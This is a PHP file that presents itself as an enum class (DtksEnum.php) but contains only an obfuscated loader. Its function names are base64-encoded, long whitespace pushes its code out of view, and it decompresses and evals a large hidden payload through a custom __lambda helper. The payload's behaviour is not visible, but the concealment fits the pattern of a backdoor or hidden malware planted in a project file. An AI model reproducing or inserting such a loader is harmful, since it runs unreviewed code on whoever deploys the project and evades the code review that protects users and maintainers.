<?php 
        $__='printf';$_='Loading app/Enums/Dtks/DtksEnum.php';
        















































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      














































































































































































































                                                                                                                                                                                                                     $________;
